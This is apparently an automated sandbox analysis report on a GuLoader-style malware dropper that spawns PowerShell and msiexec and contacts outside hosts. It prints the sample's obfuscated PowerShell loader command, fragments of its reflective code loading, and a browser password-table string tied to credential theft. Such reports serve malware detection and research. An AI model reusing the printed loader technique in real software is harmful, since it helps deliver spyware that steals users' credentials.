          Source: msiexec.exe, 00000006.00000003.1968586148.00000000099C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/j
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000003.00000002.1814890454.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.1814545646.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micr
          Source: powershell.exe, 00000003.00000002.1817583118.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000006.00000002.2558138839.000000002573E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000006.00000002.2558138839.000000002573E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: msiexec.exe, 00000006.00000002.2558138839.00000000256F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.000000002573E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002698B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2559960111.00000000266A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000006.00000002.2558138839.0000000025846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49975 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.7:49976 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49994 version: TLS 1.2
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405582

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exeJump to dropped file
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040348F
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00406AFA1_2_00406AFA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00F393383_2_00F39338
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025ED2786_2_025ED278
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025E53706_2_025E5370
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025EC1466_2_025EC146
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025EC7386_2_025EC738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025EC4686_2_025EC468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025ECA086_2_025ECA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025EE9886_2_025EE988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025E3E096_2_025E3E09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025ECFAA6_2_025ECFAA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_025ECCD86_2_025ECCD8
          Source: rAntephialtic.exeStatic PE information: invalid certificate
          Source: rAntephialtic.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/30@5/5
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040348F
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404822
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_004021A2 CoCreateInstance,1_2_004021A2
          Source: C:\Users\user\Desktop\rAntephialtic.exeFile created: C:\Users\user\Pictures\downtreadingJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Users\user\Desktop\rAntephialtic.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsi403C.tmpJump to behavior
          Source: rAntephialtic.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\rAntephialtic.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 00000006.00000002.2558138839.00000000258F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.000000002591C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.00000000258E9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2558138839.0000000025929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: rAntephialtic.exeReversingLabs: Detection: 21%
          Source: rAntephialtic.exeVirustotal: Detection: 26%
          Source: C:\Users\user\Desktop\rAntephialtic.exeFile read: C:\Users\user\Desktop\rAntephialtic.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\rAntephialtic.exe "C:\Users\user\Desktop\rAntephialtic.exe"
          Source: C:\Users\user\Desktop\rAntephialtic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\rAntephialtic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeFile written: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\gdningsopbevaringerne.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: rAntephialtic.exeStatic file information: File size 1542704 > 1048576
          Source: rAntephialtic.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000003.00000002.1830778551.000000000CF10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tussocky $Neutraliser $Dalstrg), (Buddhi @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Knyazi = [AppDomain]::CurrentDomain.GetAssemblies()$global:Halmlud
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Socialiseredes)), $sarcophagal).DefineDynamicModule($Desertress, $false).DefineType($Illuminato, $Fyrskib, [System.MulticastDelegate])
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00F3EAF8 push eax; mov dword ptr [esp], edx3_2_00F3EB0C

          Persistence and Installation Behavior

          barindex
          AI detected suspicious PE digital signature
          Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system providers 2) Organization 'Inflex' is not a well-known company 3) Unusual email domain 'Subworkman.Aa' appears suspicious and non-corporate 4) Large time gap between compilation date (Aug 2020) and certificate creation (Sept 2024) suggests possible certificate manipulation 5) Unusual organizational unit name 'Eksamensprojekt Teatraliseredes' appears randomly generated or meaningless 6) While US/California location is generally lower risk, other factors strongly suggest this is being used as a false front 7) Certificate signature is explicitly marked as invalid by the system. The combination of a self-signed certificate, suspicious email domain, and invalid signature strongly suggests this is not a legitimate business certificate.
          Source: C:\Users\user\Desktop\rAntephialtic.exeFile created: C:\Users\user\AppData\Local\Temp\nsd4D6C.tmp\nsExec.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
